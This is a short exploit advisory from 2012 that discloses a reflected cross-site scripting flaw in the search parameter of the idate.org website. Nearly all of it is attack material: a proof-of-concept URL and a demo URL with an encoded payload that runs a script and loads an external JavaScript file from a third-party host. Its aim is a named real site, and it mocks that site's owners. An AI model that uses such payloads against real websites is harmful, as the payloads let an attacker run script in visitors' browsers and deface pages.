+-------------------------------------------------------------------------+
# Exploit Title : Idate.org - website XSS (Cross Site Scripting) and deface passive
# Author        : Atmon3r
# Date          : 16/04/2012
# Xss type      : $_GET
# Personal      : At Idate, they're playing with themselves over HADOPI! xD
+-------------------------------------------------------------------------+

[+] POC:
http://www.idate.org/2009/pages/index.php?recherche={XSS}&x=15&y=10&all=recherche&idl=21

[+] DEMO:
http://www.idate.org/2009/pages/index.php?recherche=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%22%3E%3C/script%3E&x=15&y=10&all=recherche&idl=21